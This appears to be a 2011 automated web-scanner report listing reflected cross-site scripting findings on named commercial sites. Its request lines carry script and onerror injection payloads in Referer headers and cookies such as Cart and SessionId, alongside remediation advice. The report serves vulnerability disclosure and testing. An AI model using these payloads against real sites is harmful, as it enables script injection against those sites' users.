GET / HTTP/1.1 Host: www.gnc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?hl=en&q=7a28b"><script>alert(1)</script>7c72546d38e Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16387"><script>alert(1)</script>294dce3789b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home/index.jsp HTTP/1.1 Host: www.gnc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?hl=en&q=16387"><script>alert(1)</script>294dce3789b Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into an HTML comment. The payload aac6f--><script>alert(1)</script>e175c626cd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET / HTTP/1.1 Host: www.pacificgeek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=aac6f--><script>alert(1)</script>e175c626cd6
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 30 Sep 2011 13:30:52 GMT X-Powered-By: ASP.NET Content-Length: 83898 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into an HTML comment. The payload 1e58b--><script>alert(1)</script>8dfeb600483 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 30 Sep 2011 13:43:54 GMT X-Powered-By: ASP.NET Content-Length: 79264 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 41e8a<script>alert(1)</script>f52776f8ebc was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Fri, 30 Sep 2011 12:03:08 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1376
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
The value of the ResonanceSegment cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1aa(a)f737fdc7eba was submitted in the ResonanceSegment cookie. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 90215357_clogin cookie is copied into an HTML comment. The payload f02e5--><img%20src%3da%20onerror%3dalert(1)>8fc7fd52c57 was submitted in the 90215357_clogin cookie. This input was echoed as f02e5--><img src=a onerror=alert(1)>8fc7fd52c57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Cart cookie is copied into an HTML comment. The payload ff285--><img%20src%3da%20onerror%3dalert(1)>0832286a0ca was submitted in the Cart cookie. This input was echoed as ff285--><img src=a onerror=alert(1)>0832286a0ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CartId cookie is copied into an HTML comment. The payload d2bce--><img%20src%3da%20onerror%3dalert(1)>7b065e5aadc was submitted in the CartId cookie. This input was echoed as d2bce--><img src=a onerror=alert(1)>7b065e5aadc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CartSave cookie is copied into an HTML comment. The payload 92569--><img%20src%3da%20onerror%3dalert(1)>2ebad211352 was submitted in the CartSave cookie. This input was echoed as 92569--><img src=a onerror=alert(1)>2ebad211352 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreAt cookie is copied into an HTML comment. The payload e5754--><img%20src%3da%20onerror%3dalert(1)>1cee4e52eea was submitted in the CoreAt cookie. This input was echoed as e5754--><img src=a onerror=alert(1)>1cee4e52eea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreID6 cookie is copied into an HTML comment. The payload e1eff--><img%20src%3da%20onerror%3dalert(1)>25de8accf0e was submitted in the CoreID6 cookie. This input was echoed as e1eff--><img src=a onerror=alert(1)>25de8accf0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the DB cookie is copied into an HTML comment. The payload 580a1--><img%20src%3da%20onerror%3dalert(1)>3085a46cf9b was submitted in the DB cookie. This input was echoed as 580a1--><img src=a onerror=alert(1)>3085a46cf9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the SessionId cookie is copied into an HTML comment. The payload 90d2c--><img%20src%3da%20onerror%3dalert(1)>9043f721429 was submitted in the SessionId cookie. This input was echoed as 90d2c--><img src=a onerror=alert(1)>9043f721429 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the 90215357_clogin cookie is copied into an HTML comment. The payload 1522b--><img%20src%3da%20onerror%3dalert(1)>db83e617a5d was submitted in the 90215357_clogin cookie. This input was echoed as 1522b--><img src=a onerror=alert(1)>db83e617a5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Cart cookie is copied into an HTML comment. The payload e8400--><img%20src%3da%20onerror%3dalert(1)>388bbaf6467 was submitted in the Cart cookie. This input was echoed as e8400--><img src=a onerror=alert(1)>388bbaf6467 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreAt cookie is copied into an HTML comment. The payload 8693a--><img%20src%3da%20onerror%3dalert(1)>4f098fcc7c7 was submitted in the CoreAt cookie. This input was echoed as 8693a--><img src=a onerror=alert(1)>4f098fcc7c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the CoreID6 cookie is copied into an HTML comment. The payload 6cf8c--><img%20src%3da%20onerror%3dalert(1)>a54e117ae86 was submitted in the CoreID6 cookie. This input was echoed as 6cf8c--><img src=a onerror=alert(1)>a54e117ae86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the DB cookie is copied into an HTML comment. The payload 72f62--><img%20src%3da%20onerror%3dalert(1)>423e7fc100a was submitted in the DB cookie. This input was echoed as 72f62--><img src=a onerror=alert(1)>423e7fc100a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the SessionId cookie is copied into an HTML comment. The payload 78edc--><img%20src%3da%20onerror%3dalert(1)>5fa9cd9afa6 was submitted in the SessionId cookie. This input was echoed as 78edc--><img src=a onerror=alert(1)>5fa9cd9afa6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Cart cookie is copied into an HTML comment. The payload 531a8--><img%20src%3da%20onerror%3dalert(1)>5c3e9baaabe was submitted in the Cart cookie. This input was echoed as 531a8--><img src=a onerror=alert(1)>5c3e9baaabe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the DB cookie is copied into an HTML comment. The payload cab00--><img%20src%3da%20onerror%3dalert(1)>1edab8d440b was submitted in the DB cookie. This input was echoed as cab00--><img src=a onerror=alert(1)>1edab8d440b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the SessionId cookie is copied into an HTML comment. The payload 200ee--><img%20src%3da%20onerror%3dalert(1)>69b74c839f5 was submitted in the SessionId cookie. This input was echoed as 200ee--><img src=a onerror=alert(1)>69b74c839f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the Warranty cookie is copied into an HTML comment. The payload 87a7f--><img%20src%3da%20onerror%3dalert(1)>a511299d89d was submitted in the Warranty cookie. This input was echoed as 87a7f--><img src=a onerror=alert(1)>a511299d89d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.